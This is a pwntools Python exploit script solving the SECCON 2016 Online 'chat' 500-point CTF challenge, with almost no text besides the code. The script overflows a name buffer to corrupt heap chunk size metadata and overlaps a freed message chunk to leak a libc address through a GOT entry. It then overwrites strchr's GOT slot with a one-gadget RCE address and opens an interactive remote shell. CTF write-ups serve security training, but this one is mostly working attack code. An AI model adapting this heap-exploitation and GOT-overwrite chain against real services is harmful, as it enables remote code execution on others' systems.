[SECCON 2016 Online] chat 500

chat.py

from pwn import *
import string

strcmp_got = 0x603050
free_libc = 0x222c40
free_got = 0x603018
strchr_libc = 0x86d40
strchr_got = 0x603038
#system_libc = 0x46590
system_libc = 0xe5765 # One gadget RCE

target_func_libc = strchr_libc # required: the least significant byte is in printable chars
target_func_got = strchr_got

s = remote('chat.pwn.seccon.jp', 26895)

s.send('1\n') # Sign up
s.send('0\n')

s.send('2\n') # Sign in
s.send('0\n')

s.send('4\n') # Send public message
s.send('\n')

s.send('7\n') # Change name
s.send('A' * 24 + '\xf1\n') # overwrite chunk size of the message

for i in range(23, 15, -1):
    s.send('7\n') # Change name
    s.send('A' * i + '\n')

s.send('0\n') # Sign out

s.send('1\n') # Sign up
s.send('0' * 29 + '\n') # overwrapped by the message

s.send('1\n') # Sign up
s.send('0' * 30 + '\n') # separator for "List Users"

s.send('2\n') # Sign in
s.send('A' * 16 + '\n')

s.send('7\n') # Change name
s.send('\n') # free the chunk of the message

s.send('1\n') # Sign up
s.send('A' * 30 + '\n') # filling the freed message space

s.send('2\n') # Sign in
s.send('A' * 30 + '\n')

s.send('4\n') # Send public message
s.send('A' * 0x60 + p64(target_func_got) + '\n') # overwrite name buffer

s.recv(4096)

# leaking libc address
s.send('3\n') # List users
print s.recvuntil('Users List\n')
print s.recvuntil('0' * 30)
print s.recvuntil('* ')
target_func_addr = u64(s.recvuntil('\n')[:-1].ljust(8, '\0'))
print s.recv(1024)
libc_base = target_func_addr - target_func_libc
print 'target:', hex(target_func_addr)
print 'libc_base:', hex(libc_base)

s.send('0\n') # Sign out

s.send('2\n') # Sign in
s.send(p64(target_func_addr) + '\n')

print 'jump to', hex(libc_base + system_libc)
s.send('7\n') # Change name
s.send(p64(libc_base + system_libc) + '\n') # GOT overwrite

s.send('\n')

s.interactive()